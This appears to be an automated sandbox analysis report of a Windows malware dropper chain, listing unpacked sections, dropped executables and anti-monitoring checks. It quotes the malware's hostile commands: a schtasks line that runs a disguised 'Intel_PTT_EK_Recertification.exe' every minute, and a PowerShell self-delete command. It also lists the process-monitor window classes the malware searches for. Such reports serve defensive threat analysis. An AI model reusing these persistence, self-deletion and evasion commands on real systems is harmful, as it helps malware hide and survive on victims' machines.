Source:	Binary string: wntdll.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1719451495.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719610384.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722745520.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722951311.0000000005280000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1718937003.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719152846.0000000005520000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722506920.00000000052D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722308783.00000000050E0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: 4ec75545d6.exe, 00000007.00000003.1719451495.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719610384.00000000054D0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722745520.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1722951311.0000000005280000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1719929384.0000000005450000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1719840913.0000000005330000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723179047.0000000000D00000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723273327.0000000005160000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: 4ec75545d6.exe, 00000007.00000003.1720228406.0000000005330000.00000004.00000001.00020000.00000000.sdmp, 4ec75545d6.exe, 00000007.00000003.1720451138.0000000005550000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723494227.00000000050E0000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1723743224.0000000005300000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.9d0000.0.unpack :EW;.rsrc:W;.idata :W;kkeyqygg:EW;nkvdmfgh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;kkeyqygg:EW;nkvdmfgh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.900000.0.unpack :EW;.rsrc:W;.idata :W;kkeyqygg:EW;nkvdmfgh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;kkeyqygg:EW;nkvdmfgh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.900000.0.unpack :EW;.rsrc:W;.idata :W;kkeyqygg:EW;nkvdmfgh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;kkeyqygg:EW;nkvdmfgh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Unpacked PE file: 7.2.4ec75545d6.exe.490000.0.unpack :EW;.rsrc:W;.idata :W; :EW;hbzcjodo:EW;irlgpdtj:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;hbzcjodo:EW;irlgpdtj:EW;.taggant:EW;

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell ping 127.0.0.1; del in.exe

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 3a1a782de7.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xc2aa1
Source: random[1].exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xc2aa1
Source: 7z.dll.21.dr	Static PE information: real checksum: 0x0 should be: 0x1a2c6b
Source: in.exe.32.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: 7z.exe.21.dr	Static PE information: real checksum: 0x0 should be: 0x7b29e
Source: random[1].exe1.4.dr	Static PE information: real checksum: 0x1e48da should be: 0x1e6fac
Source: 4ec75545d6.exe.4.dr	Static PE information: real checksum: 0x1e48da should be: 0x1e6fac
Source: Intel_PTT_EK_Recertification.exe.34.dr	Static PE information: real checksum: 0x0 should be: 0x1c320c
Source: file.exe	Static PE information: real checksum: 0x2d5c2e should be: 0x2de556
Source: random[1].exe0.4.dr	Static PE information: real checksum: 0x0 should be: 0xc8597
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x2d5c2e should be: 0x2de556
Source: 44cc35716d.exe.4.dr	Static PE information: real checksum: 0x0 should be: 0xc8597
Source: random[2].exe.4.dr	Static PE information: real checksum: 0x447249 should be: 0x4451ed
Source: bc8eaffed4.exe.4.dr	Static PE information: real checksum: 0x447249 should be: 0x4451ed

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name: kkeyqygg
Source: file.exe	Static PE information: section name: nkvdmfgh
Source: file.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name: kkeyqygg
Source: skotes.exe.0.dr	Static PE information: section name: nkvdmfgh
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[2].exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name: .idata
Source: random[2].exe.4.dr	Static PE information: section name:
Source: random[2].exe.4.dr	Static PE information: section name: pxmrbptw
Source: random[2].exe.4.dr	Static PE information: section name: trmdtetf
Source: random[2].exe.4.dr	Static PE information: section name: .taggant
Source: bc8eaffed4.exe.4.dr	Static PE information: section name:
Source: bc8eaffed4.exe.4.dr	Static PE information: section name: .idata
Source: bc8eaffed4.exe.4.dr	Static PE information: section name:
Source: bc8eaffed4.exe.4.dr	Static PE information: section name: pxmrbptw
Source: bc8eaffed4.exe.4.dr	Static PE information: section name: trmdtetf
Source: bc8eaffed4.exe.4.dr	Static PE information: section name: .taggant
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: .idata
Source: random[1].exe1.4.dr	Static PE information: section name:
Source: random[1].exe1.4.dr	Static PE information: section name: hbzcjodo
Source: random[1].exe1.4.dr	Static PE information: section name: irlgpdtj
Source: random[1].exe1.4.dr	Static PE information: section name: .taggant
Source: 4ec75545d6.exe.4.dr	Static PE information: section name:
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: .idata
Source: 4ec75545d6.exe.4.dr	Static PE information: section name:
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: hbzcjodo
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: irlgpdtj
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: .taggant
Source: in.exe.32.dr	Static PE information: section name: UPX2
Source: Intel_PTT_EK_Recertification.exe.34.dr	Static PE information: section name: UPX2

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009ED91C push ecx; ret	0_2_009ED92F
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_009E1359 push es; ret	0_2_009E135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 2_2_0091D91C push ecx; ret	2_2_0091D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_2_0091D91C push ecx; ret	3_2_0091D92F
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CA840 push ebp; retf	7_3_004CA841
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CB86D push ebx; ret	7_3_004CB864
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CE80E push eax; iretd	7_3_004CE81D
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CE83C pushad ; ret	7_3_004CE841
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CA0F9 push FFFFFF82h; iretd	7_3_004CA0FB
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CEE8C push es; iretd	7_3_004CEE8D
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CD8A0 push 0000002Eh; iretd	7_3_004CD8A2
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CEF6E push FFFFFFD2h; retf	7_3_004CEF91
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004C9F6A push eax; ret	7_3_004C9F75
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CB70B push ebx; ret	7_3_004CB864
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CB1DD push eax; ret	7_3_004CB1DF
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CE586 pushad ; retf	7_3_004CE599
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Code function: 7_3_004CEF92 push 00000038h; iretd	7_3_004CEF9D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A758BC pushad ; ret	8_3_00A758C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A7588E push eax; iretd	8_3_00A7589D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A728ED push ebx; ret	8_3_00A728E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A718C0 push ebp; retf	8_3_00A718C1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A75606 pushad ; retf	8_3_00A75619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A76012 push 00000038h; iretd	8_3_00A7601D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A7225D push eax; ret	8_3_00A7225F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A7278B push ebx; ret	8_3_00A728E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A75FEE push FFFFFFD2h; retf	8_3_00A76011
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A70FEA push eax; ret	8_3_00A70FF5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A74920 push 0000002Eh; iretd	8_3_00A74922
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A75F0C push es; iretd	8_3_00A75F0D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_3_00A71179 push FFFFFF82h; iretd	8_3_00A7117B
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Code function: 12_2_0030534A push ecx; ret	12_2_0030535D

Source: file.exe	Static PE information: section name: entropy: 7.9713345640321585
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.9713345640321585
Source: random[2].exe.4.dr	Static PE information: section name: pxmrbptw entropy: 7.9544823426723354
Source: bc8eaffed4.exe.4.dr	Static PE information: section name: pxmrbptw entropy: 7.9544823426723354
Source: random[1].exe1.4.dr	Static PE information: section name: entropy: 7.981905229950873
Source: random[1].exe1.4.dr	Static PE information: section name: hbzcjodo entropy: 7.951225545619903
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: entropy: 7.981905229950873
Source: 4ec75545d6.exe.4.dr	Static PE information: section name: hbzcjodo entropy: 7.951225545619903

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Windows\System32\cmd.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	Process created: attrib.exe

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\7z.exe	File created: C:\Users\user\AppData\Local\Temp\main\extracted\in.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\main\in.exe	File created: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016896001\44cc35716d.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	File created: C:\Users\user\AppData\Local\Temp\main\7z.exe	Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1016897001\bc8eaffed4.exe	Window searched: window name: Regmonclass

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\main\in.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE

Source: C:\Users\user\Desktop\file.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016894001\4ec75545d6.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016895001\3a1a782de7.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1016898001\c46817b905.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
